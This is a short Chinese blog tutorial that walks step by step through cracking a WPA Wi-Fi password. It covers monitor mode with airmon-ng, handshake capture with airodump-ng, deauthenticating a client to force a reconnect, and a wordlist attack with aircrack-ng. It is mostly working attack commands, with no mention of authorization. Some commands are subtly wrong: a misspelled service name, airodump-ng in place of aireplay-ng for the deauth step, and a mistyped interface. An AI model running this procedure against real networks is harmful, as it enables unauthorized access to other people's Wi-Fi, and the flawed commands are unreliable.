WPA作为目前无线最主流的加密系统，可以说是安全度非常高。目前针对WPA加密的无线，我们只能通过暴力破解的方式进行破解。下面来做演示。

首先还是老规矩，将不必要的进程关闭，并将网卡置入侦听模式。

service network-mannager stop

airmon-ng check kill

airmon-ng start wlan0

开始抓包并保存抓包数据。

airodump-ng wlan0mon –bssid ECxxxxxxxxB6 -c 11 -w wpa

此时当我用手机对WPA加密的AP进行连接后，如果抓包正常抓去了连接过程，则会在右上角显示 握手包抓取成功提示！这里我们可以看到并没有抓取到！这和无线网络本身不稳定有关。

为了成功抓取到握手包，我们可以采用 aireplay-ng 来强制让手机客户端与AP断开，进行重新连接！

airodump-ng -0 2 -a ECxxxxxxxxxB6 -c 68xxxxxxxxAA waln0mon

这里我们使其进行了两次重连。

我们回到抓包界面，此时我们可以看到已经成功抓取到握手信息。

拿到了握手包后，下面我们就可以正式开始破解了。

aircrack-ng -w /usr/share/john/password.lst wpa-01.cap

很快密码就被破解出来了 Password ！

原创文章，转载请注明来源！即刻安全（secist.com）

文章地址：http://www.secist.com/?p=69&preview=true

转载请注明：即刻安全 » (五)无线渗透之WPA密码破解